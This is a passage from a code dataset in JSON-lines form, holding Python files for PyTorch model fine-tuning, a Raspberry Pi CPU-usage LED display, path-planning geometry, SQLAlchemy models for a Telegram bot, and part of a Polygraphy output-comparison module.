'wb'))","repo_name":"fyk7/home_credit_script","sub_path":"src/train_kfold.py","file_name":"train_kfold.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16070244239","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport yaml\nfrom argparse import Namespace\n\nfrom torch_models import LSTM_Transformer\nfrom data_utils.get_data import get_classifier_data\n\ndevice = 'cuda'\n\ndef finetune(yaml_transformer, data_file, save_folder, new_name, \n load_date=None, yaml_pretraining=None):\n X_train, y_train, X_val, y_val, X_test, y_test, n_classes, encoder =\\\n get_classifier_data(data_file)\n \n print(f'Training shape: {X_train.shape}')\n print(f'Validation shape: {X_val.shape}')\n print(f'Test shape: {X_test.shape}') \n\n print(y_train.shape) \n\n transformer_config = yaml_transformer + '.yaml'\n with open(transformer_config, 'r') as stream:\n config = yaml.load(stream, Loader=yaml.FullLoader)\n config = Namespace(**config)\n if not load_date is None:\n \n trajectory_config = save_folder + '/' + yaml_pretraining + load_date + '.yaml'\n with open(trajectory_config, 'r') as stream:\n t_config = yaml.load(stream, Loader=yaml.FullLoader)\n t_config = Namespace(**t_config)\n pred_len = t_config.pred_len\n \n load_model = LSTM_Transformer(pred_type='trajectory',\n out_dim=2*pred_len,\n n_offense=config.n_offense,\n n_defense=config.n_defense,\n hidden_dim=config.hidden_dim,\n num_layers=config.num_layers,\n nhead=config.nhead,\n dropout=config.dropout).to(device)\n load_model_path = save_folder + '/' + t_config.name + load_date + '.pth'\n load_model.load_state_dict(torch.load(load_model_path))\n load_model.to(device)\n \n learning_rate = float(config.learning_rate)\n batch_size = config.batch_size\n patience = config.patience\n num_epochs = config.num_epochs\n model = LSTM_Transformer(pred_type='classify_deepset',\n out_dim=n_classes,\n n_offense=config.n_offense,\n n_defense=config.n_defense,\n hidden_dim=config.hidden_dim,\n num_layers=config.num_layers,\n nhead=config.nhead,\n dropout=config.dropout).to(device) \n \n if not load_date is None:\n params1 = load_model.named_parameters()\n params2 = model.named_parameters()\n \n dict_params2 = dict(params2)\n for name1, param1 in params1:\n if name1 in dict_params2:\n dict_params2[name1].data.copy_(param1.data) \n \n criterion = nn.NLLLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n \n n_train = X_train.shape[0]\n n_val = X_val.shape[0]\n \n best_loss = 9999\n best_epoch = 0\n # Train the model\n for epoch in range(num_epochs):\n permutation = torch.randperm(n_train)\n \n loss_avg = 0\n for i in range(0, n_train, batch_size):\n model.train()\n optimizer.zero_grad()\n \n indices = permutation[i:i+batch_size]\n batch_x, batch_y = X_train[indices], y_train[indices]\n batch_x = Variable(torch.from_numpy(batch_x)).to(device)\n batch_y = Variable(torch.from_numpy(batch_y)).to(device)\n \n outs = model(batch_x.float())\n \n # obtain the loss function\n loss = criterion(outs, batch_y.long())\n \n loss.backward()\n optimizer.step()\n \n loss_avg += loss.item()*batch_x.shape[0]/n_train\n \n with torch.no_grad():\n idxs = torch.arange(n_val)\n correct = 0\n val_samples = 0\n val_loss_avg = 0\n for i in range(0, n_val, batch_size):\n model.eval()\n \n indices = idxs[i:i+batch_size]\n batch_x, batch_y = X_val[indices], y_val[indices]\n batch_x = Variable(torch.from_numpy(batch_x)).to(device)\n 
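# As in the training loop above, lift the numpy validation slice onto the\n # device as tensors. (Variable() has been a no-op wrapper since PyTorch 0.4,\n # so plain torch.from_numpy(...).to(device) would behave identically here.)\n 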
batch_y = Variable(torch.from_numpy(batch_y)).to(device)\n batch_y = batch_y.long().flatten()\n \n outs = model(batch_x.float())\n \n loss = criterion(outs, batch_y)\n val_loss_avg += loss.item()*batch_x.shape[0]/n_val\n \n arg_out = torch.argmax(outs, dim=-1)\n correct += (arg_out == batch_y).float().sum()\n val_samples += batch_y.shape[0]\n val_acc = correct / float(val_samples)\n if val_loss_avg < best_loss:\n print('best so far (saving):')\n best_loss = val_loss_avg\n best_epoch = epoch\n torch.save(model, save_folder+'/'+new_name+'.pth')\n if epoch - best_epoch > patience:\n break\n print(f'Epoch {epoch}: train_loss {loss_avg:0.4f} val_loss {val_loss_avg:0.4f} val_acc {100*val_acc:.2f}%')\n print('done. have a nice day!')\n\nif __name__ == '__main__':\n finetune('./NFL_transformer_settings', '../data/middle.pkl', './saved_models', 'without_pretraining (36%)', \n load_date=None, yaml_pretraining='NFL_trajectory_settings')\n","repo_name":"camzach/NETS-NFL","sub_path":"NETS/finetuning.py","file_name":"finetuning.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31638299092","text":"#! /usr/bin/python3\n\n# Display the cpu usage of the 4 cores on the pi-topPULSE led matrix\n#\n# for Raspberry Pi 3\n#\n# by @rricharz\n\nfrom ptpulse import ledmatrix\nimport os\nimport time\n\nlastWork = [0, 0, 0, 0]\nlastIdle = [0, 0, 0, 0]\n\n\ndef getCpuRates():\n global lastWork, lastIdle\n rate = [0, 0, 0, 0]\n f = open(\"/proc/stat\", \"r\")\n line = \"\"\n for i in range(0, 4):\n while not \"cpu\"+str(i) in line:\n line = f.readline()\n # print(line)\n splitline = line.split()\n work = int(splitline[1]) + int(splitline[2]) + int(splitline[3])\n idle = int(splitline[4])\n diffWork = work - lastWork[i]\n diffIdle = idle - lastIdle[i]\n rate[i] = float(diffWork) / float(diffIdle+diffWork)\n lastWork[i] = work\n lastIdle[i] = idle\n f.close()\n return rate\n\n\nledmatrix.rotation(0)\nwhile True:\n rate = getCpuRates()\n ledmatrix.clear()\n for i in range(0, 4):\n level = int(6.99 * rate[i])\n if level < 4:\n r = 0\n g = 255\n b = 0\n elif level < 6:\n r = 255\n g = 255\n b = 6\n else:\n r = 255\n g = 0\n b = 0\n for y in range(0, level+1):\n ledmatrix.set_pixel(2 * i, y, r, g, b)\n\n ledmatrix.show()\n time.sleep(1)\n\n\nledmatrix.clear()\nledmatrix.show()\n","repo_name":"Helenous/Pi-top-Pulse","sub_path":"examples/showusage.py","file_name":"showusage.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"598421414","text":"import copy\nimport math\nimport constants\n\nimport time\nimport shapely.geometry\n\n# ----------------------------------------------- LOGGER SET UP ------------------------------------------------\nimport logging\nimport datetime\nimport os\n\ndate = datetime.date.today()\nlogging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.getcwd(), 'logs/navy_log_' + str(date) + '.log'),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt=\"%H:%M:%S\")\nlogger = logging.getLogger(\"GM\")\nlogger.setLevel(logging.DEBUG)\n\n\n# --------------------------------------------- END LOGGER SET UP ------------------------------------------------\n\ndef calculate_distance(a: object, b: object, lon_lat_to_km=True) -> float:\n \"\"\"\n Calculates Euclidean distance\n :param a: Point\n :param b: Point\n :param lon_lat_to_km: bool, whether distance translated from lon_lat\n 
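(When True, the deltas are first converted to km: the north-south leg via a fixed km-per-degree factor, the east-west leg additionally scaled by cos(mean latitude); the distance is then sqrt(dx_km ** 2 + dy_km ** 2), per the helpers below.)\n 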
:return: Float distance\n \"\"\"\n t_0 = time.perf_counter()\n\n if lon_lat_to_km:\n latitudinal_distance_in_km = longitudinal_distance_to_km(a.y, b.y)\n mean_latitude = (a.y + b.y) / 2\n longitudinal_distance_in_km = latitudinal_distance_to_km(a.x, b.x, mean_latitude)\n distance = math.sqrt(latitudinal_distance_in_km ** 2 + longitudinal_distance_in_km ** 2)\n else:\n distance = math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)\n\n t_1 = time.perf_counter()\n constants.time_spent_calculating_distance += (t_1 - t_0)\n return distance\n\n\ndef longitudinal_distance_to_km(lon_1: float, lon_2: float) -> float:\n return abs((lon_1 - lon_2) * constants.LATITUDE_CONVERSION_FACTOR)\n\n\ndef latitudinal_distance_to_km(lat_1: float, lat_2: float, approx_long: float) -> float:\n return abs((lat_1 - lat_2) * (constants.LONGITUDE_CONVERSION_FACTOR *\n math.cos(math.radians(approx_long))))\n\n\ndef km_to_longitudinal_distance(kilometers: float) -> float:\n \"\"\"\n Takes kilometers distance and converts it to approximate longitudinal points\n :param kilometers:\n :return:\n \"\"\"\n return kilometers / constants.LATITUDE_CONVERSION_FACTOR\n\n\ndef km_to_latitudinal_distance(kilometers: float, approx_long) -> float:\n \"\"\"\n Takes kilometer distance and converts it to approximate latitudinal points\n :param kilometers:\n :param approx_long:\n :return:\n \"\"\"\n return kilometers / (constants.LONGITUDE_CONVERSION_FACTOR *\n math.cos(math.radians(approx_long)))\n\n\ndef is_between_points(a: object, b: object, tested_point: object) -> bool:\n \"\"\"\n :param a: Point\n :param b: Point\n :param tested_point: Point\n :return:\n \"\"\"\n cross_product = (tested_point.y - a.y) * (b.x - a.x) - (tested_point.x - a.x) * (b.y - a.y)\n\n if abs(cross_product) > 0.001:\n return False\n\n dot_product = (tested_point.x - a.x) * (b.x - a.x) + (tested_point.y - a.y) * (b.y - a.y)\n if dot_product < 0:\n return False\n\n squaredlengthba = (b.x - a.x) * (b.x - a.x) + (b.y - a.y) * (b.y - a.y)\n if dot_product > squaredlengthba:\n return False\n\n return True\n\n\ndef orientation(p: object, q: object, r: object) -> int:\n \"\"\"\n Return numerical orientation\n 1 for clockwise\n -1 for counter-clockwise\n 0 for collinear\n :param p: Point\n :param q: Point\n :param r: Point\n :return:\n \"\"\"\n val = ccw(p, q, r)\n if val > 0:\n return 1\n elif val < 0:\n return -1\n else:\n return 0\n\n\ndef ccw(a: object, b: object, c: object) -> float:\n \"\"\"\n See if going from point b to c is counterclockwise after moving from a to b\n :param a: Point\n :param b: Point\n :param c: Point\n :return:\n \"\"\"\n return (b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x)\n\n\ndef next_point_ccw(a: object, b: object, c: object) -> bool:\n \"\"\"\n Checks if going from point b to c is clockwise or counterclockwise in reference to the line a to b\n :param a: Point\n :param b: Point\n :param c: Point\n :return:\n \"\"\"\n area = ccw(a, b, c)\n if area < 0:\n return False\n elif area > 0:\n return True\n else: # Not including collinear points\n return False\n\n\ndef shared_segment(p: object, q: object, r: object) -> bool:\n \"\"\"\n See if two vectors p->r and q->r have a shared segment\n :param p: Point\n :param q: Point\n :param r: Point\n :return:\n \"\"\"\n if max(p.x, r.x) >= q.x >= min(p.x, r.x) and max(p.y, r.y) >= q.y >= min(p.y, r.y):\n return True\n else:\n return False\n\n\ndef do_intersect(p1: object, q1: object, p2: object, q2: object) -> bool:\n \"\"\"\n Check intersection from line p1->q1 and line p2->q2\n :param p1: Point - 
Start point line 1\n :param q1: Point - End point line 1\n :param p2: Point - Start point line 2\n :param q2: Point - End point line 2\n :return:\n \"\"\"\n o_1 = orientation(p1, q1, p2)\n o_2 = orientation(p1, q1, q2)\n o_3 = orientation(p2, q2, p1)\n o_4 = orientation(p2, q2, q1)\n\n # General Case\n if o_1 != o_2 and o_3 != o_4:\n return True\n # Collinear Cases\n elif o_1 == 0 and shared_segment(p1, p2, q1):\n return True\n elif o_2 == 0 and shared_segment(p1, q2, q1):\n return True\n elif o_3 == 0 and shared_segment(p2, p1, q2):\n return True\n elif o_4 == 0 and shared_segment(p2, q1, q2):\n return True\n else:\n return False\n\n\ndef check_if_lines_intersect(line_l: list, line_k: list, except_end_points=True) -> bool:\n \"\"\"\n Check if two lines intersect.\n :param except_end_points: Include or except endpoints in the check\n :param line_l:\n :param line_k:\n :return:\n \"\"\"\n\n line_1 = shapely.geometry.LineString([[line_k[0].x, line_k[0].y], [line_k[1].x, line_k[1].y]])\n line_2 = shapely.geometry.LineString([[line_l[0].x, line_l[0].y], [line_l[1].x, line_l[1].y]])\n if except_end_points:\n # Except if the line shares an endpoint - passing through 2 points on the polygon is handled in the polygon\n # line checker\n # print(f\"{str(line_k[0])}, {str(line_k[1])}, {str(line_l[0])}, {str(line_l[1])}\")\n # print(f\"{line_k[0] == line_l[0]}, {line_k[1] == line_l[0]}, {line_k[0] == line_l[1]}, {line_k[1] == line_l[0]}\")\n if line_k[0] == line_l[0] or line_k[1] == line_l[0] or line_k[0] == line_l[1] or line_k[1] == line_l[1]:\n return False\n # case if point is exactly on the line\n elif (check_if_point_on_line(point=shapely.geometry.Point(line_k[0].x, line_k[0].y), line=line_2) or\n check_if_point_on_line(point=shapely.geometry.Point(line_k[1].x, line_k[1].y), line=line_2) or\n check_if_point_on_line(point=shapely.geometry.Point(line_l[0].x, line_l[0].y), line=line_1) or\n check_if_point_on_line(point=shapely.geometry.Point(line_l[1].x, line_l[1].y), line=line_1)):\n return False\n intersect = line_1.intersects(line_2)\n return intersect\n\n # l_1 = line_l[0]\n # l_2 = line_l[1]\n # k_1 = line_k[0]\n # k_2 = line_k[1]\n #\n # # Shorten lines slightly to avoid endpoints (e.g. 
if we arrive exactly at polygon point)\n # l_1 = copy.deepcopy(l_1)\n # l_2 = copy.deepcopy(l_2)\n # k_1 = copy.deepcopy(k_1)\n # k_2 = copy.deepcopy(k_2)\n #\n # l_1.x, l_2.x = l_1.x * 0.9999 + l_2.x * 0.0001, l_1.x * 0.0001 + l_2.x * 0.9999\n # l_1.y, l_2.y = l_1.y * 0.9999 + l_2.y * 0.0001, l_1.y * 0.0001 + l_2.y * 0.9999\n #\n # k_1.x, k_2.x = k_1.x * 0.9999 + k_2.x * 0.0001, k_1.x * 0.0001 + k_2.x * 0.9999\n # k_1.y, k_2.y = k_1.y * 0.9999 + k_2.y * 0.0001, k_1.y * 0.0001 + k_2.y * 0.9999\n #\n # return do_intersect(l_1, l_2, k_1, k_2)\n\n\ndef check_if_point_on_line(point, line):\n if isinstance(line, list):\n line = shapely.geometry.LineString([[line[0].x, line[0].y], [line[1].x, line[1].y]])\n if not isinstance(point, shapely.Point):\n point = shapely.geometry.Point(point.x, point.y)\n\n if line.distance(point) < 1e-8:\n return True\n else:\n return False\n\n\ndef maximize_concavity(path: list, polygons: list) -> list:\n \"\"\"\n Check if some parts of the provided route is concave - See if we can remove points inbetween\n without violating any polygons and retaining required points\n :param path: list of points across which is travelled\n :param polygons:\n :return:\n \"\"\"\n # logger.debug(f\"Maximizing concavity for path {[str(p) for p in path]}\")\n shorter_route = [path[0]]\n\n i = 0\n j = len(path) - 1\n\n iterations = 0\n\n while i < len(path):\n p_i = path[i]\n # logger.debug(f\"{i=}, {str(p_i)=}, {j=}, {len(path)=}\")\n iterations += 1\n if iterations > constants.ITERATION_LIMIT:\n raise TimeoutError(\"Concavity Optimization Not Converging.\")\n\n # maintain_point = False\n # for p in path[i+1:j+1]:\n # # See if we run into a point that has to be maintained\n # if p.force_maintain:\n # logger.debug(f\"Forced to maintain point {p}\")\n # p_j = p\n # j = path.index(p)\n # maintain_point = True\n # break\n\n # Otherwise take j the furthest away\n # if not maintain_point:\n p_j = path[j]\n # logger.debug(f\"Taking furthest point {str(p_j)}\")\n\n i_to_j = not any([polygon.check_if_line_through_polygon(p_i, p_j) for polygon in polygons])\n if j == len(path) - 1 and i_to_j:\n shorter_route.append(path[-1])\n\n # logger.debug(f\"Able to reach end of path going from {p_i} to {path[-1]} - returning\"\n # f\"{[str(p) for p in shorter_route]}\")\n return shorter_route\n\n # if we can't go further than 1 step, make that step (we know it is feasible)\n if j == i + 1:\n shorter_route.append(path[j])\n i = j\n j = len(path) - 1\n # logger.debug(f\"Can't make more than one step, going from {p_i} to {p_j}\")\n continue\n\n if i_to_j:\n shorter_route.append(p_j)\n i = j\n j = len(path) - 1\n # logger.debug(f\"Going from {p_i} to {p_j} (latest feasible option)\")\n else:\n j -= 1\n # logger.debug(f\"Not feasible - reducing j\")\n\n\ndef calculate_direction_vector(point_a: object, point_b: object) -> list:\n \"\"\"\n Calculates the normalized direction vector from point a to point b\n :param point_a: point of departure\n :param point_b: point of arrival\n :return:\n \"\"\"\n if point_a is point_b:\n raise ValueError(f\"Traversing between same points: {point_a}\")\n normalisation_value = math.sqrt((point_b.x - point_a.x) ** 2 + (point_b.y - point_a.y) ** 2)\n if normalisation_value == 0:\n logger.warning(f\"Normalisation value of 0 - direction from {str(point_a)} to {str(point_b)}\")\n\n return [0, 0]\n x_change = (point_b.x - point_a.x) / normalisation_value\n y_change = (point_b.y - point_a.y) / normalisation_value\n\n return [x_change, y_change]\n\n\ndef 
find_lowest_point_in_polygon(points: list) -> object:\n return min(points, key=lambda p: p.y)\n\n\ndef calculate_polar_angle(a: object, b: object) -> float:\n \"\"\"\n calculate polar angle between two points\n :param a: First Point\n :param b: Point relative to first\n :return:\n \"\"\"\n return math.degrees(math.atan2(b.y - a.y, b.x - a.x))\n\n\ndef graham_scan(points: list) -> list:\n \"\"\"\n Applies Graham Scan algorithm to make a convex hull out of a set of points.\n An exception is when the graham scan receives points with \"force_maintain\" characteristics\n This will create a non-convex hull that ensures that these points are contained\n :param points: List of Points objects\n :return:\n \"\"\"\n # logger.debug(\"STARTING GRAHAM SCAN\")\n # logger.debug(f\"Received points: {[str(point) for point in points]}\")\n\n starting_point = find_lowest_point_in_polygon(points)\n points.remove(starting_point)\n\n points.sort(key=lambda p: calculate_polar_angle(starting_point, p))\n convex_hull = [starting_point, points.pop(0)]\n\n for index, point in enumerate(points):\n if index > len(points):\n pass\n elif index == len(points):\n if next_point_ccw(convex_hull[-2], convex_hull[-1], starting_point):\n pass\n else:\n convex_hull.pop()\n convex_hull.append(point)\n else:\n if len(convex_hull) > 2:\n iterations = 0\n while not next_point_ccw(convex_hull[-2], convex_hull[-1], point):\n\n iterations += 1\n if iterations > constants.ITERATION_LIMIT:\n TimeoutError(f\"Unable to locate next CCW point: {convex_hull}\")\n\n if len(convex_hull) > 0:\n convex_hull.pop()\n convex_hull.append(point)\n return convex_hull\n\n\ndef find_closest_reachable_point(target: object, polygon: object) -> object:\n \"\"\"\n :param target: Point - Location from which we want to reach to a polygon\n :param polygon: Nearby Polygon object\n :return:\n \"\"\"\n # logger.debug(f\"Finding closest point - polygon is {[str(p) for p in polygon.points]}\")\n distances = []\n for p in polygon.points:\n obstructed = polygon.check_if_line_through_polygon(p, target)\n if not obstructed:\n distances.append([p, target.distance_to_point(p)])\n else:\n # logger.debug(f\"Unable to reach {p} from {target}.\")\n pass\n\n if len(distances) == 0:\n target.add_point_to_plot(axes=constants.axes_plot, color=\"yellow\", text=\"T\")\n raise ValueError(f\"Could not make a line from {target} to {[str(p) for p in polygon.points]}\")\n closest_point = min(distances, key=lambda x: x[1])[0]\n return closest_point\n\n\ndef check_if_point_in_polygons(polygons, point, exclude_edges=True) -> bool:\n for polygon in polygons:\n if polygon.check_if_contains_point(point, exclude_edges=exclude_edges):\n return True\n return False\n","repo_name":"Salted-Pepper/UAV_surveillance_v2","sub_path":"general_maths.py","file_name":"general_maths.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38968003124","text":"import random\nfrom random import shuffle\n\n\ndef readDataSet(filename, prob):\n file = open(filename, 'r')\n\n lines = [line.strip() for line in file.readlines()]\n attributes = [attribute.strip() for attribute in lines.pop(0).split(\",\")]\n targetAttribute = attributes[len(attributes)-1]\n\n dataSet = []\n for line in lines:\n dataSet.append(dict(zip(attributes, [element.strip() for element in line.split(\",\")])))\n file.close()\n\n shuffle(dataSet)\n newDataSet = depopulateDataSet(dataSet, attributes, targetAttribute, prob)\n\n return newDataSet, 
attributes, targetAttribute\n\n\ndef depopulateDataSet(dataSet, attributes, targetAttribute, prob):\n # With probability p, select a record from the data set and remove one of its attributes\n for i in range(0, len(dataSet)-1):\n x = random.random()\n if x <= prob:\n d = dataSet[i]\n # Select the attribute to remove\n y = random.randint(0, len(attributes)-1)\n if attributes[y] != targetAttribute:\n d[attributes[y]] = '?'\n\n return dataSet","repo_name":"loredeluca/AI_Project","sub_path":"DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"31118687972","text":"from sqlalchemy import Column, String, ForeignKey, Table, Integer, BigInteger, Float, DateTime, Boolean\nfrom sqlalchemy.orm import registry, relationship\n# from datetime import datetime\n\nfrom db import engine\nfrom db.states import UserStates\n\nmapper_registry = registry()\nBase = mapper_registry.generate_base()\n\n# order_product_association = Table(\n# 'orders_products',\n# mapper_registry.metadata,\n# Column('order_id', ForeignKey('orders.id'), primary_key=True),\n# Column('product_id', ForeignKey('products.id'), primary_key=True)\n# )\n\nuser_order_association = Table(\n 'users_orders',\n mapper_registry.metadata,\n Column('user_id', ForeignKey('telegram_users.telegram_id'), primary_key=True),\n Column('order_id', ForeignKey('orders.id'), primary_key=True)\n)\n\n\nclass User(Base):\n __tablename__ = 'telegram_users'\n\n telegram_id = Column(BigInteger, primary_key=True)\n\n username = Column(String(32), default='')\n name = Column(String, default='')\n kaspi = Column(String(20), default='')\n state = Column(String(10), default=UserStates.CREATED.value)\n\n orders = relationship('Order', back_populates='user')\n\n def __repr__(self):\n return f'User<{self.telegram_id}>(username={self.name}, kaspi={self.kaspi}, state={self.state})'\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n is_finished = Column(Boolean, default=False)\n\n chat_id = Column(BigInteger, default='')\n message_id = Column(BigInteger, default='')\n user_id = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n\n user = relationship('User', back_populates='orders')\n joined_users = relationship('User', secondary=user_order_association)\n texts = relationship('OrderText', back_populates='order')\n\n # products = relationship('Product', secondary=order_product_association)\n\n def __repr__(self):\n return f'Order<{self.id}>(is_finished={self.is_finished}, user_id={self.user_id}, chat_id={self.chat_id})'\n\n\nclass OrderText(Base):\n __tablename__ = 'order_texts'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n text = Column(String)\n\n user_id = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n order_id = Column(Integer, ForeignKey('orders.id'))\n\n user = relationship('User')\n order = relationship('Order', back_populates='texts')\n\n def __repr__(self):\n return f'OrderText<{self.id}>(user_id={self.user_id} order_id={self.order_id} text={self.text})'\n\n\n# class Product(Base):\n\n\n# __tablename__ = 'products'\n#\n# id = Column(Integer, primary_key=True, autoincrement=True)\n# name = Column(String, unique=True)\n# price = Column(Float, default=0)\n# updated_at = Column(DateTime, onupdate=datetime.now, default=datetime.now)\n# updated_by = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n# orders = 
relationship('Order', secondary=order_product_association, back_populates='products')\n#\n# def __repr__(self):\n# return f'Product<{self.id}>(name={self.name} price={self.price})'\n\n\ndef create_tables():\n mapper_registry.metadata.create_all(engine)\n\n\nif __name__ == '__main__':\n create_tables()\n","repo_name":"Jiklopo/biometric-rahmet-bot","sub_path":"db/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70315574887","text":"import functools\nfrom collections import OrderedDict\n\nfrom polygraphy import mod, util\nfrom polygraphy.comparator import util as comp_util\nfrom polygraphy.logger import G_LOGGER, LogMode\n\nnp = mod.lazy_import(\"numpy\")\n\n\n@mod.export()\nclass OutputCompareResult:\n \"\"\"\n Represents the result of comparing a single output of a single iteration\n between two runners.\n \"\"\"\n\n def __init__(self, passed, max_absdiff, max_reldiff, mean_absdiff, mean_reldiff, median_absdiff, median_reldiff):\n \"\"\"\n Records the required tolerances and other statistics gathered during comparison.\n\n Args:\n passed (bool):\n Whether the error was within acceptable limits.\n max_absdiff (float):\n The minimum required absolute tolerance to consider the outputs equivalent.\n max_reldiff (float):\n The minimum required relative tolerance to consider the outputs equivalent.\n mean_absdiff (float):\n The mean absolute error between the outputs.\n mean_reldiff (float):\n The mean relative error between the outputs.\n median_absdiff (float):\n The median absolute error between the outputs.\n median_reldiff (float):\n The median relative error between the outputs.\n \"\"\"\n self.passed = passed\n self.max_absdiff = max_absdiff\n self.max_reldiff = max_reldiff\n self.mean_absdiff = mean_absdiff\n self.mean_reldiff = mean_reldiff\n self.median_absdiff = median_absdiff\n self.median_reldiff = median_reldiff\n\n def __bool__(self):\n \"\"\"\n Whether the output matched.\n\n Returns:\n bool\n \"\"\"\n return self.passed\n\n def __str__(self):\n return f\"(atol={self.max_absdiff}, rtol={self.max_reldiff})\"\n\n\ndef default_find_output_func(output_name, index, iter_result, base_iter_result):\n found_name = util.find_str_in_iterable(output_name, iter_result.keys(), index)\n if found_name is None:\n return None\n elif found_name != output_name:\n exact_match = util.find_str_in_iterable(found_name, base_iter_result.keys())\n if exact_match == found_name:\n G_LOGGER.verbose(\n f\"Will not compare {found_name} with {output_name}, since the former already has an exact match: {exact_match}\"\n )\n return (\n None # If the found output is being compared against another output already, skip this non-exact match\n )\n G_LOGGER.warning(\n f\"Output names did not match exactly. 
Assuming {iter_result.runner_name} output: {found_name} corresponds to output: {output_name}\"\n )\n return [found_name]\n\n\ndef run_comparison(func, fail_fast, iter_result0, iter_result1, find_output_func):\n \"\"\"\n Iterates over all the generated outputs and runs `func` to compare them.\n \"\"\"\n output_status = OrderedDict() # OrderedDict[str, bool] Maps output names to whether they matched.\n\n for index, (out0_name, output0) in enumerate(iter_result0.items()):\n out1_names = util.default(find_output_func(out0_name, index, iter_result1), [])\n\n if len(out1_names) > 1:\n G_LOGGER.info(\n f\"Will attempt to compare output: '{out0_name}' [{iter_result0.runner_name}] with multiple outputs: '{list(out1_names)}' [{iter_result1.runner_name}]\"\n )\n\n for out1_name in out1_names:\n if out1_name is None or out1_name not in iter_result1:\n G_LOGGER.warning(\n f\"For output: '{out0_name}' [{iter_result0.runner_name}], skipping corresponding output: '{out1_name}' [{iter_result1.runner_name}], since the output was not found\"\n )\n continue\n\n output1 = iter_result1[out1_name]\n\n G_LOGGER.start(\n f\"Comparing Output: '{out0_name}' (dtype={output0.dtype}, shape={output0.shape}) with '{out1_name}' (dtype={output1.dtype}, shape={output1.shape})\"\n )\n with G_LOGGER.indent():\n output_status[out0_name] = func(out0_name, output0, out1_name, output1)\n if fail_fast and not output_status[out0_name]:\n return output_status\n\n mismatched_output_names = [name for name, matched in output_status.items() if not matched]\n if mismatched_output_names:\n G_LOGGER.error(f\"FAILED | Mismatched outputs: {mismatched_output_names}\")\n else:\n G_LOGGER.finish(f\"PASSED | All outputs matched | Outputs: {list(output_status.keys())}\")\n\n # This is useful for catching cases were Polygraphy does something wrong with the runner output buffers\n if not output_status and (bool(iter_result0.keys()) or bool(iter_result1.keys())):\n r0_name = iter_result0.runner_name\n r0_outs = list(iter_result0.keys())\n r1_name = iter_result1.runner_name\n r1_outs = list(iter_result1.keys())\n G_LOGGER.critical(\n f\"All outputs were skipped, no common outputs found! Note:\\n{r0_name} outputs: {r0_outs}\\n{r1_name} outputs: {r1_outs}\"\n )\n\n return output_status\n\n\n# Provides functions to compare two IterationResults\n@mod.export()\nclass CompareFunc:\n \"\"\"\n Provides functions that can be used to compare two `IterationResult` s.\n \"\"\"\n\n @staticmethod\n def simple(\n check_shapes=None,\n rtol=None,\n atol=None,\n fail_fast=None,\n find_output_func=None,\n check_error_stat=None,\n infinities_compare_equal=None,\n save_heatmaps=None,\n show_heatmaps=None,\n save_error_metrics_plot=None,\n show_error_metrics_plot=None,\n ):\n \"\"\"\n Creates a function that compares two IterationResults, and can be used as the `compare_func` argument\n in ``Comparator.compare_accuracy``.\n\n Args:\n check_shapes (bool):\n Whether shapes must match exactly. If this is False, this function may\n permute or reshape outputs before comparison.\n Defaults to True.\n rtol (Union[float, Dict[str, float]]):\n The relative tolerance to use when checking accuracy.\n This is expressed as a percentage of the second set of output values.\n For example, a value of 0.01 would check that the first set of outputs is within 1% of the second.\n\n This can be provided on a per-output basis using a dictionary. 
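For example, rtol={\"\": 1e-5, \"scores\": 1e-3} (the output name here is purely illustrative) checks most outputs at 1e-5 but relaxes the output named \"scores\" to 1e-3. 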
In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n Defaults to 1e-5.\n atol (Union[float, Dict[str, float]]):\n The absolute tolerance to use when checking accuracy.\n This can be provided on a per-output basis using a dictionary. In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n Defaults to 1e-5.\n fail_fast (bool):\n Whether the function should exit immediately after the first failure.\n Defaults to False.\n find_output_func (Callable(str, int, IterationResult) -> List[str]):\n A callback that returns a list of output names to compare against from the provided\n IterationResult, given an output name and index from another IterationResult.\n The comparison function will always iterate over the output names of the\n first IterationResult, expecting names from the second. A return value of\n `[]` or `None` indicates that the output should be skipped.\n check_error_stat (Union[str, Dict[str, str]]):\n The error statistic to check. Possible values are:\n\n - \"elemwise\": Checks each element in the output to determine if it exceeds both tolerances specified.\n The minimum required tolerances displayed in this mode are only applicable when just one type of tolerance\n is set. Because of the nature of the check, when both absolute/relative tolerance are specified, the required\n minimum tolerances may be lower.\n\n - \"max\": Checks the maximum absolute/relative errors against the respective tolerances. This is the strictest possible check.\n - \"mean\" Checks the mean absolute/relative errors against the respective tolerances.\n - \"median\": Checks the median absolute/relative errors against the respective tolerances.\n\n This can be provided on a per-output basis using a dictionary. 
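For example, check_error_stat={\"\": \"elemwise\", \"scores\": \"median\"} (the output name is illustrative) applies the stricter element-wise check everywhere except the output named \"scores\". 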
